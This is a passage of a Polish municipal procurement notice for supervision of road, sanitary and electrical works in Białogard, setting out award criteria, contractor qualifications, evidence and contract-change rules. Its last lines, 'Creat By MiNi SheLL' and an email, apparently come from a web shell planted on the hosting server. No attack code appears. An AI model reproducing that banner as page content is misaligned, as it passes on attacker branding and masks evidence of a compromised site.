nadzoru inwestorskiego przy prowadzeniu robót budowlanych z branży drogowej, instalacji sanitarnych i instalacji elektrycznych (jednej lub kilku branż łącznie).<br/>4.	Zamówienie na wskazane w ust. 3 usługi zostanie udzielone na podstawie odrębnej umowy po przeprowadzeniu negocjacji w zakresie przedmiotu umowy i ceny.<br/>5.	Zarówno Zamawiającemu, jak i Wykonawcy nie przysługuje roszczenie o zawarcie umowy na usługi wskazane w ust. 3, jest to jedynie prawna możliwość zawarcia umowy z dotychczasowym Wykonawcą po wynegocjowaniu jej postanowień w toku odrębnego postępowania o udzielenie zamówienia publicznego.<br/>6.	W przypadku, gdy wartość zamówienia polegającego na powtórzeniu podobnych usług nie przekroczy kwot określonych w przepisach, o których mowa w art. 3 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2021 r. poz. 1129 z dn. 24.06.2021 r. z późn. zm.) zamawiający udzieli zamówienia w oparciu o regulacje wewnętrzne dotyczące zasad i trybu przygotowania i prowadzenia w Urzędzie Miasta Białogard postępowań o udzielenie zamówień publicznych, których wartość nie przekracza kwoty 130 000 złotych.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Ocena w poszczególnych kryteriach zostanie dokonana z dokładnością do dwóch miejsc po przecinku.<br/>2.	Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru:<br/>L = C + IK + IN1 + IN2<br/>gdzie:<br/>L – całkowita liczba punktów,<br/>C – punkty uzyskane w kryterium „Cena ofertowa brutto”,<br/>IK – punkty uzyskane w kryterium „Doświadczenie zawodowe Inżyniera Rezydenta / Inżyniera Kontraktu”,<br/>IN1 – punkty uzyskane w kryterium „Doświadczenie zawodowe Inspektora Nadzoru branży drogowej”,<br/>IN2 – punkty uzyskane w kryterium „Doświadczenie zawodowe Inspektora Nadzoru branży instalacji i sieci sanitarnych”.<br/>3.	Za najwyżej ocenioną, zostanie uznana oferta z najwyższą liczbą punktów, spośród nieodrzuconych ofert złożonych w postępowaniu. <br/>4.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim wymaganiom przedstawionym w ustawie Pzp, oraz w SWZ i zostanie oceniona jako najkorzystniejsza w oparciu o podane kryteria wyboru.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe Inżyniera Rezydenta - IK</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe Inspektora Nadzoru branży drogowej - IN1</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe Inspektora Nadzoru branży instalacji i sieci sanitarnych - IN2</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1.1 zdolności do występowania w obrocie gospodarczym<br/> Zamawiający nie stawia warunków w ww. zakresie.<br/>1.2	uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej<br/> Zamawiający nie stawia warunków w ww. zakresie.<br/>1.3	sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie stawia warunków w ww. zakresie.<br/>1.4	zdolności technicznej lub zawodowej<br/>1)	Zamawiający uzna ww. warunek za spełniony jeżeli Wykonawca wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej jedną usługę polegającą na pełnieniu co najmniej jednej z funkcji: inspektora nadzoru inwestorskiego, inżyniera kontraktu, kierownika zespołu inwestora zastępczego, obejmującą pełnienie funkcji nadzoru nad wykonaniem robót budowlanych dotyczących budowy lub przebudowy drogi o wartości robót nie mniejszej niż 2 000 000 zł brutto (Zamawiający dopuszcza, aby ww. inwestycja była prowadzona w formule „wybuduj” lub „zaprojektuj i wybuduj”).<br/>2)	Zamawiający uzna ww. warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje <br/>lub będzie dysponował osobami, skierowanymi przez wykonawcę do realizacji zamówienia publicznego, posiadającymi następujące kwalifikacje:<br/>a)	Kierownik Zespołu - Inżynier Kontraktu (Inżynier Rezydent):<br/>	wykształcenie wyższe techniczne,<br/>	minimum 5-letnie doświadczenie zawodowe, w tym w pełnieniu funkcji kierownika budowy lub inspektora nadzoru przy realizacji co najmniej jednej roboty budowlanej o wartości 2 000 000 zł brutto.<br/>b) Inspektor Nadzoru – specjalista w zakresie robót drogowych, posiadający:<br/>	wykształcenie wyższe techniczne,<br/>	uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami budowlanymi w specjalności drogowej lub równoważne wydane na podstawie wcześniej obowiązujących przepisów,<br/>	co najmniej 5-letnie doświadczenie zawodowe jako kierownik budowy lub inspektor nadzoru w specjalności drogowej, w tym nad co najmniej jedną robotą drogową o wartości nie mniejszej niż 2 000 000 zł brutto.<br/>c)	Inspektor Nadzoru – specjalista w zakresie robót elektrycznych i elektroenergetycznych, posiadający:<br/>	wykształcenie wyższe techniczne,<br/>	uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub równoważne wydane na podstawie wcześniej obowiązujących przepisów,<br/>	co najmniej 5-letnie doświadczenie zawodowe na stanowisku kierownika budowy lub inspektora nadzoru robót elektrycznych i elektroenergetycznych,<br/>d)	Inspektor Nadzoru – specjalista w zakresie robót instalacji i sieci sanitarnych, posiadający:<br/>	wykształcenie wyższe techniczne,<br/>	uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci i instalacji sanitarnych lub równoważne wydane na podstawie wcześniej obowiązujących przepisów, nie mniej niż 5-letnie doświadczenie zawodowe w pełnieniu samodzielnych funkcji w budownictwie, tj. jako kierownik budowy lub inspektor nadzoru robót w zakresie sieci i instalacji sanitarnych,<br/>Dopuszcza się łączenie maksymalnie dwóch z w/w funkcji przez jedną osobę, jeśli wykazana osoba posiada wymagane uprawnienia i doświadczenie. Dopuszcza się łączenie funkcji Inżyniera Rezydenta z funkcją jednego z wymienionych ekspertów kluczowych. W przypadku konieczności, Inżynier Kontraktu zobowiązany jest zapewnić taką liczbę ekspertów kluczowych, aby w danej chwili zagwarantować sprawne i bezkolizyjne zarządzanie projektem oraz realizację zadania. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia środków dowodowych, o których mowa poniżej: <br/>2.	W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego, Zamawiający żąda następujących podmiotowych środków dowodowych:<br/>1)	zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 Pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz <br/>z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności; <br/>2)	zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert Wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>3)	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>3.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast:<br/>1)	zaświadczenia, o którym mowa w ust. 2 pkt 1, zaświadczenia albo innego dokumentu potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, o których mowa w ust. 2 pkt 2, lub odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, o których mowa w ust. 2 pkt 3 - składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: <br/>a)	nie naruszył obowiązków dotyczących płatności podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne, <br/>b)	nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. <br/>4.	Dokumenty, o których mowa w ust. 3 pkt 1, powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia środków dowodowych, o których mowa poniżej:.<br/>2.	W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej, Zamawiający żąda następujących podmiotowych środków dowodowych:<br/>1)	wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy, wzór wykazu stanowi Załącznik nr 4 do SWZ.<br/>2)	wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz<br/>z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami; wzór wykazu stanowi Załącznik nr 5 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1)	Wypełniony Formularz oferty – wzór stanowi Załącznik nr 2 do SWZ;<br/>2) Oświadczenie, o którym mowa w art. 125 ust. 1 Pzp, którego wzór stanowi Załącznik nr 3 do SWZ; <br/>3)	Zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, które składa Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, <br/>o którym mowa w art. 118 ust. 3 Pzp, wzór stanowi Załącznik nr 6 do SWZ (jeżeli dotyczy);<br/>4)	Pełnomocnictwo do podpisania oferty w imieniu Wykonawcy (jeżeli dotyczy);<br/>5)	Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego wynika, które usługi wykonają poszczególni Wykonawcy, o którym mowa w art. 117 ust. 4 Pzp, którego wzór stanowi Załącznik nr 7 do SWZ (jeżeli dotyczy); <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>2. Wykonawcy składający ofertę wspólną ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy. Do oferty wspólnej Wykonawcy dołączają pełnomocnictwo podpisane przez osoby upoważnione do składania oświadczeń woli każdego ze wspólników.<br/>3.	W odniesieniu do warunków dotyczących kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. <br/>4. W przypadku, o którym mowa w ust. 3, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane lub usługi wykonają poszczególni Wykonawcy. Wzór oświadczenia stanowi Załącznik nr 7 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje możliwość wprowadzenia zmian do umowy polegających na:<br/>1)	zmianie terminu realizacji przedmiotu umowy,<br/>2)	zmianie wynagrodzenia,<br/>3)	zmianie składu zespołu, o którym mowa w § 3 ust. 3.<br/>2.	Zmiana terminu realizacji przedmiotu umowy może nastąpić w przypadku:<br/>1)	wydłużenia lub skrócenia czasu trwania robót budowlanych lub zmiany planowanego okresu realizacji robót budowlanych,<br/>2)	konieczności dostosowania do zmian w przepisach prawa dotyczących realizacji zadania.<br/>3.	Zmiana wynagrodzenia umownego będzie możliwa w następujących przypadkach:<br/>1)	zmiany stawki podatku od towarów i usług; wartość netto wynagrodzenia nie ulega zmianie, a określona w aneksie wartość brutt wynagrodzenia zostanie wyliczona na podstawie nowych przepisów;<br/>2)	zmiany wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej ustalonych na podstawie przepisów z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę; wynagrodzenie wykonawcy ulegnie wówczas modyfikacji o wartość zmiany całkowitego kosztu wykonawcy wynikającego ze zmiany wynagrodzeń o pracę albo wysokości minimalnej stawki godzinowej osób bezpośrednio wykonujących zamówienie do wysokości minimalnej stawki za pracę albo do wysokości minimalnej stawki godzinowej, z uwzględnieniem wszystkich obciążeń publicznoprawnych od kwoty wzrostu minimalnego wynagrodzenia,<br/>3)	zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne; wynagrodzenie wykonawcy ulegnie wówczas modyfikacji o wartość zmiany całkowitego kosztu wykonawcy, jaki będzie on zobowiązany ponieść przy uwzględnieniu tej zmiany, przy zachowaniu dotychczasowej kwoty netto wynagrodzenia osób bezpośrednio wykonujących zamówienie;<br/>4)	przedłużenia terminu realizacji robót budowlanych o co najmniej 2 miesiące, wówczas wykonawcy będzie przysługiwało wynagrodzenie w wysokości proporcjonalnej do przedłużenia terminu realizacji umowy – w wysokości 4% wynagrodzenia umownego za każdy miesiąc przedłużenia terminu realizacji umowy.<br/>4.	Zmiana wynagrodzenia obowiązywać będzie od podpisania aneksu i będzie obejmować wyrównanie za okres od dnia wejścia w życie zmian, o których mowa w ust. 3 pkt 1, 2 i 3, lecz nie wcześniej niż od dnia złożenia przez wykonawcę uzasadnionego wniosku, o którym mowa w ust. 6.<br/>5.	Zamawiający przewiduje także zmianę wysokości wynagrodzenia za realizację przedmiotu umowy w przypadku zmiany kosztów związanych z realizacją przedmiotu umowy.<br/>6.	Zmiana wynagrodzenia, o której mowa w ust. 5, zostanie dokonana zgodnie z poniższymi zasadami:<br/>1)	waloryzacja wynagrodzenia będzie odbywać się w oparciu o wskaźnik cen towarów i usług konsumpcyjnych ustalany przez Prezesa Głównego Urzędu Statystycznego i ogłaszanego w Dzienniku Urzędowym RP „Monitor Polski”,<br/>2)	każda Strona może wystąpić z wnioskiem o zmianę wynagrodzenia, jeżeli z komunikatów prezesa GUS wynikać będzie wzrost/spadek cen za miesiąc, w którym upływa 12 miesięcy od dnia, w którym upłynął termin składania ofert, w porównaniu z miesiącem, w którym upłynął termin składania ofert, wynosi co najmniej (+/-) 5%,<br/>3)	pierwsza waloryzacja może nastąpić po upływie 12 miesięcy od dnia składania ofert i będzie wyliczona jako średnia arytmetyczna ze wskaźnika za okres poprzednich 12 miesięcy; każda kolejna waloryzacja może być dokonana po upływie 12 miesięcy od poprzedniej i będzie wyliczona jako średnia arytmetyczna z uwzględnieniem wskaźnika za okres, który upłynął od poprzedniej waloryzacji,<br/>4)	wynagrodzenie będzie podlegało waloryzacji maksymalnie do 5% wynagrodzenia, o którym mowa w § 5 ust. 1,<br/>5)	postanowień umownych w zakresie waloryzacji nie stosuje się od chwili osiągnięcia limitu, o którym mowa w pkt 4,<br/>Pozostałe zapisy zawarte są we wzorze umowy, stanowiącym załącznik nr 1 do SWZ w §9. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-27 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-27 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-26</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin wykonania zamówienia: 1.	Od dnia podpisania umowy do dnia ostatecznego odbioru robót budowlanych wstępnie przewidzianego na dzień 31 maja 2024 r. <br/>2.	Wykonawca będzie wykonywał swoje obowiązki od dnia zawarcia umowy poprzez czas realizacji inwestycji do czasu rozliczenia końcowego zadania. <br/>3.	Nadzór powykonawczy wykonawca wykonywać będzie w okresie gwarancji na zrealizowane roboty budowlane (nie mniej niż 3 lata).

Creat By MiNi SheLL
Email: jattceo@gmail.com